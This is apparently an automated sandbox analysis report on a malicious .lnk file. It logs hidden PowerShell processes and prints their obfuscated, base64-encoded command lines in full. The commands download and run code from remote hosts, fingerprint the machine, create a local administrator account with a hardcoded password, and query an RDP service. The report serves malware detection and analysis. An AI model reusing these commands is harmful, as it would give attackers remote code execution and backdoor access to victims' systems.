      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
      Source: gW6FHWNFzR.lnkStatic file information: File size 17825792 > 1048576
      Source: Binary string: em.pdbAoAIAAgACAAIAAgAC source: powershell.exe, 0000000B.00000002.3876568092.000001F1DC88F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ib.pdbC source: powershell.exe, 00000007.00000002.3050489833.0000014074F4A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: bb.pdb source: powershell.exe, 00000007.00000002.3050489833.0000014074F4A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Management.Automation.pdbPro source: powershell.exe, 00000007.00000002.3050489833.0000014074F4A000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("QWdhV1lvSkdkc2IySmhiRHBLVTBOVVRGUkVUVU5QTG14bGJtZDBhQ0F0WjNRZ01Da05DaUFnSUNCN0RRb2dJQ0FnSUNBZ0lDUm5iRzlpWVd3NlNsTkRWRXhVUkUxRFR5QXJQU0FpTFMwdExTMHRMUzB0TFNJN0RRb2dJQ0FnSUNBZ0lIUnllUT
      Obfuscated command line found
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit
      PowerShell case anomaly found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" Jump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKAC